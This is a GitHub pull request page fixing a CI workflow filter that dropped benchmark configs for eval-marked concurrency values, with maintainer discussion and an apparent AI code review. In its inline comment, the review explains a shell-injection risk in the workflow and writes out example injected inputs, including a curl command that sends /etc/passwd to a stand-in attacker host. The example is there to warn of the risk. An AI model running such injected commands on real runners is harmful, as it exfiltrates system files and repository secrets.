Skip to content

Fix e2e-tests dropping highest concurrency benchmark configs#1020

Merged
Ankur-singh merged 3 commits intomainfrom
nv/fix-e2e-run-test-config-diff
Apr 10, 2026
Merged

Fix e2e-tests dropping highest concurrency benchmark configs#1020
Ankur-singh merged 3 commits intomainfrom
nv/fix-e2e-run-test-config-diff

Conversation

@Ankur-singh
Copy link
Copy Markdown
Collaborator

Problem

The e2e-tests.yml workflow silently drops benchmark runs for the highest and median concurrency configs on 8k1k sequence lengths.

Root cause

mark_eval_entries() marks selected entries (highest + median conc for 8k1k) with run-eval=True. The SINGLE job filter then excludes these entries:

# Old filter — excludes run-eval=True from benchmarks
SINGLE = [x for x in d if 'prefill' not in x and not x.get('run-eval', False)]

These excluded configs only appear in the EVALS job, which runs with eval-only: true — meaning no throughput benchmark is ever executed for them.

How run-sweep handles this differently

run-sweep.yml uses process_changelog.py which calls generate_sweep_configs.py test-config with --no-evals for benchmarks and --evals-only for evals in separate passes. This means ALL concurrency values are always benchmarked, and evals are generated independently.

In contrast, e2e-tests.yml generates everything in one pass and then splits — causing the eval-marked entries to be carved out of the benchmark list entirely.

Impact

Across all NVIDIA + AMD configs, 172 benchmark configs were being silently skipped. For example, with minimaxm2.5-fp8-b200-vllm, these 8k1k configs were never benchmarked:

  • tp=2 conc=64 (median)
  • tp=2 conc=512 (highest)
  • tp=4 conc=64 (median)
  • tp=4 conc=512 (highest)

Fix

Remove the run-eval filter from the SINGLE config generation. Since benchmark and eval jobs are separate (SINGLE hardcodes run-eval: false, EVALS hardcodes run-eval: true + eval-only: true), there is no need to exclude eval-marked entries from benchmarks:

# New filter — all single-node configs are benchmarked
SINGLE = [x for x in d if 'prefill' not in x]

Eval-marked entries now run both benchmark (via SINGLE) and eval (via EVALS), which is the correct behavior.

Remove run-eval filter from SINGLE job config generation so all
single-node configs are benchmarked regardless of eval marking.
@Oseltamivir
Copy link
Copy Markdown
Collaborator

@Ankur-singh Thanks for the catch, having look rn. Will patch ASAP if indeed broken

Copy link
Copy Markdown
Contributor

@claude claude bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM — the one-line fix correctly removes the erroneous exclusion from SINGLE, since that job already hardcodes downstream.

Extended reasoning...

Overview

This PR modifies a single line in , removing the predicate from the SINGLE config filter. No other files are touched.

Security risks

The pre-existing unquoted expression interpolation on lines 55-56 (flagged as an inline comment) is a legitimate injection risk but predates this PR entirely. The one-line change introduced here does not add or worsen any security surface.

Level of scrutiny

This is a low-risk, mechanical fix to a CI workflow filter. The logic is self-evident: SINGLE already passes to the benchmark template unconditionally, so filtering out eval-marked entries beforehand was a bug causing 172 configs to be silently skipped. Removing the filter restores the intended behavior.

Other factors

The description provides a clear root-cause analysis and contrasts the fix with how handles the same split correctly. No ambiguity in the intent or implementation.

Comment thread .github/workflows/e2e-tests.yml Outdated
Comment on lines +54 to +57
pip install pydantic
CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py \
${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }})
SINGLE=$(echo "$CONFIG_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(json.dumps([x for x in d if 'prefill' not in x and not x.get('run-eval', False)]))")
SINGLE=$(echo "$CONFIG_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(json.dumps([x for x in d if 'prefill' not in x]))")
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🟣 The generate-cli-command input is interpolated directly into the shell command on line 56 without quoting, allowing shell metacharacters in the input to inject arbitrary commands. This is a pre-existing issue unrelated to this PR's change; the fix is to quote the expression: "${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}", or assign it to an environment variable first.

Extended reasoning...

What the bug is and how it manifests

In GitHub Actions, expressions like ${{ inputs.foo }} inside a run: block are string-substituted directly into the shell script text before the shell interprets it. This means if inputs.generate-cli-command contains shell metacharacters — semicolons, backticks, $(...), newlines, etc. — they become part of the raw shell script and execute as commands.

The specific code path that triggers it

Lines 55-56 of .github/workflows/e2e-tests.yml:

CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py \
  ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }})

The ${{ ... }} expression is unquoted, so its text lands verbatim in the shell script.

Why existing code does not prevent it

There is no input sanitization or validation on generate-cli-command in the workflow definition. The input is declared as a plain type: string with no restrictions. GitHub Actions does not sanitize expression output in run: contexts — it only sanitizes values when they are passed via env: variables (where the shell never sees the raw substitution).

What the impact would be

A crafted input like --flag; curl https://attacker.example/exfil?$(cat /etc/passwd) # would cause the runner to execute the exfiltration command in the CI environment, which has access to repository secrets (e.g., REPO_PAT). GitHub's own security hardening guide explicitly calls this pattern out as a critical injection risk.

How to fix it

Assign the expression to an environment variable and reference the variable in the shell command:

env:
  GENERATE_CLI_CMD: ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}
run: |
  CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py $GENERATE_CLI_CMD)

Or, at minimum, add double quotes: "${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}" (which protects against word-splitting and some metacharacters but is not as robust as the env-var approach).

Step-by-step proof

  1. A user with repo write access triggers the workflow with: generate-cli-command = '--config foo; echo INJECTED > /tmp/pwned'
  2. GitHub Actions substitutes the expression, producing the shell script line: CONFIG_JSON=$(python3 .../generate_sweep_configs.py --config foo; echo INJECTED > /tmp/pwned)
  3. The shell sees two commands separated by ;: the python3 invocation, then echo INJECTED > /tmp/pwned.
  4. Both execute; the injection succeeds.

Pre-existing status

This vulnerability predates this PR. The PR only modifies line 57 (removing the run-eval filter from SINGLE), while the vulnerable interpolation is on lines 55-56 and was not changed. It is flagged here because the PR touches the same run: block, making this a natural point to note the issue.

@Oseltamivir
Copy link
Copy Markdown
Collaborator

@Ankur-singh

Thanks for catch once again. That was added because --evals-only causes mark_eval_entries() line 936 to filter to only eval-marked entries. CONFIG_JSON contains only entries with run-eval=True but SINGLE: all non-prefill entries → runs benchmarks for them (run-eval hardcoded false) EVALS: same entries → runs evals. This is wrong as --evals-only should skip benchmarks, but now they run too.

The intention is:

Flags mark_eval_entries() runs? Effect
Default (no flags) Yes Both evals and throughput should run. This SHOULD happen during perf-changelog. Bug that this PR fixes: eval-marked 8k1k configs are excluded from SINGLE and only appear in EVALS with eval-only: true. No throughput benchmark for them.
--no-evals No No entries get run-eval=True, so the SINGLE filter drops nothing. All configs are benchmarked. No evals run.
--evals-only Yes Entries without run-eval=True are filtered out entirely (line 936). Only eval-marked configs survive, and they land in EVALS with eval-only: true. Benchmark-only configs SHOULD be discarded Bug that this introduces and that line intended to fix: SINGLE: all non-prefill entries → runs benchmarks for them even though --evals-only should skip benchmarks

In default mode, the old filter not x.get('run-eval', False) excluded eval-marked entries from SINGLE. The new logic checks whether all non-prefill entries are eval-marked. In default mode they aren't (only highest/median concurrency 8k1k configs are marked), so all(...) is False and SINGLE includes everything, fixing the original bug.

In --evals-only mode, generate_sweep_configs.py filters to only eval-marked entries, so every non-prefill entry has run-eval=True. all(...) is True, SINGLE becomes [], and no benchmarks run, preserving the intended behavior and preventing the regression.


Quick test:

python3 -c "
import json

def pr_fix_no_guard(d):
    return [x for x in d if 'prefill' not in x]

def our_fix(d):
    s = [x for x in d if 'prefill' not in x]
    return [] if s and all(x.get('run-eval', False) for x in s) else s

def original(d):
    return [x for x in d if 'prefill' not in x and not x.get('run-eval', False)]

evals_only_data = [
    {'name': 'c', 'conc': 256, 'run-eval': True},
    {'name': 'd', 'conc': 512, 'run-eval': True},
]

default_data = [
    {'name': 'a', 'conc': 64},
    {'name': 'b', 'conc': 128},
    {'name': 'c', 'conc': 256, 'run-eval': True},
    {'name': 'd', 'conc': 512, 'run-eval': True},
]

print('=== --evals-only mode (expect SINGLE=0, no benchmarks) ===')
print(f'  main (original):      SINGLE={len(original(evals_only_data))} entries')
print(f'  PR fix (no guard):    SINGLE={len(pr_fix_no_guard(evals_only_data))} entries  <-- REGRESSION: benchmarks run')
print(f'  Our fix (with guard): SINGLE={len(our_fix(evals_only_data))} entries')
print()
print('=== Default mode (expect SINGLE=4, all configs benchmarked) ===')
print(f'  main (original):      SINGLE={len(original(default_data))} entries  <-- BUG: eval-marked configs dropped') 
print(f'  PR fix (no guard):    SINGLE={len(pr_fix_no_guard(default_data))} entries')
print(f'  Our fix (with guard): SINGLE={len(our_fix(default_data))} entries')
"

Output:

=== --evals-only mode (expect SINGLE=0, no benchmarks) ===
  main (original):      SINGLE=0 entries
  PR fix (no guard):    SINGLE=2 entries  <-- REGRESSION: benchmarks run
  Our fix (with guard): SINGLE=0 entries

=== Default mode (expect SINGLE=4, all configs benchmarked) ===
  main (original):      SINGLE=2 entries  <-- BUG: eval-marked configs dropped
  PR fix (no guard):    SINGLE=4 entries
  Our fix (with guard): SINGLE=4 entries

@Ankur-singh
Copy link
Copy Markdown
Collaborator Author

@Oseltamivir that makes sense. tysm!

@Oseltamivir
Copy link
Copy Markdown
Collaborator

@Ankur-singh Lol my fix has another bug where it fails when a config has only 8k1k with a single concurrency value, because mark_eval_entries marks every entry, making it indistinguishable from --evals-only mode.

I'll just stamp EVAL_ONLY and make the tests more stringent

Copy link
Copy Markdown
Collaborator

@Oseltamivir Oseltamivir left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

lgtm

@Oseltamivir
Copy link
Copy Markdown
Collaborator

@Ankur-singh I'll merge this in tmr morning after looking at it again when I'm combobulated. Please help me to look through it one more time too.

Thanks so much 🙏🫡

@Ankur-singh Ankur-singh merged commit 68bf34d into main Apr 10, 2026
4 checks passed
@Ankur-singh Ankur-singh deleted the nv/fix-e2e-run-test-config-diff branch April 10, 2026 07:26
@Ankur-singh
Copy link
Copy Markdown
Collaborator Author

Ankur-singh commented Apr 10, 2026

Sorry about that 🫣
Please revert!

@Oseltamivir
Copy link
Copy Markdown
Collaborator

Lol it's fine, probably good now with stamp of EVAL_ONLY, but will still have a look tmr and PR if smt wrong again

@Ankur-singh
Copy link
Copy Markdown
Collaborator Author

We are in this together 😂🤞

JohnQinAMD pushed a commit to JohnQinAMD/InferenceX that referenced this pull request Apr 11, 2026
JohnQinAMD added a commit to JohnQinAMD/InferenceX that referenced this pull request Apr 11, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

Development

Successfully merging this pull request may close these issues.

2 participants